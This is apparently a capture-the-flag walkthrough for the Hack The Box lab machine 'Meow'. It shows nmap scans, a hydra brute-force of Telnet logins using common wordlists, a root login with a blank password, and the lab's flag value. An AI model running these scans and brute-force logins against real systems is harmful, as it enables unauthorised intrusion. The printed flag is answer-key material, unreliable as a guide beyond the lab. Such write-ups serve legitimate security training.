01.MEOW (TELNET)
Telnet, Protocols, Reconnaissance, Weak Credentials, Misconfiguration
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ nmap -sV -T4 10.129.201.145 -p-
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
root@htb:~$ nmap -sV -sC -T4 10.129.201.145 -p 23
* the -sC option (lowercase "s"; Nmap flags are case-sensitive) runs the default set of Nmap
scripts (NSE scripts, equivalent to --script=default), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln 10.129.201.145 -p 23
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 23
- e.g., weak Telnet configurations, or known vulnerabilities in the Telnet
service
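- if no results are found then the service may be fully patched, but this only means none of
the scripts' specific checks matched; it does not rule out misconfiguration such as weak or
blank credentials, and Telnet still sends logins in cleartext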
#BRUTE FORCE USERNAME & PASSWORD
root@htb:~$ locate username
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ locate password
/usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .
root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.201.145 telnet
[23][telnet] host: 10.129.201.145 login: root password: dragon
[23][telnet] host: 10.129.201.145 login: root password: querty
[23][telnet] host: 10.129.201.145 login: root password: master
[23][telnet] host: 10.129.201.145 login: root password: 1234567
[23][telnet] host: 10.129.201.145 login: root password: trustno1
[23][telnet] host: 10.129.201.145 login: root password: letmein
[23][telnet] host: 10.129.201.145 login: root password: 111111
[23][telnet] host: 10.129.201.145 login: root password: abc123
[23][telnet] host: 10.129.201.145 login: root password: iloveyou
[23][telnet] host: 10.129.201.145 login: root password: monkey
[23][telnet] host: 10.129.201.145 login: root password: 123456
[23][telnet] host: 10.129.201.145 login: root password: 12345678
[23][telnet] host: 10.129.201.145 login: root password: password
[23][telnet] host: 10.129.201.145 login: root password: sunshine
[23][telnet] host: 10.129.201.145 login: root password: baseball
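[23][telnet] host: 10.129.201.145 login: root password: 123123
* hydra reporting every password in the list as valid for root is a sign of false positives:
most likely the root account accepts a login without any password (as the session below
suggests), so the real finding is a blank root password on Telnet, not 16 working passwords.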
root@htb:~$ telnet {targetIP/domain}
Meow login: root
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19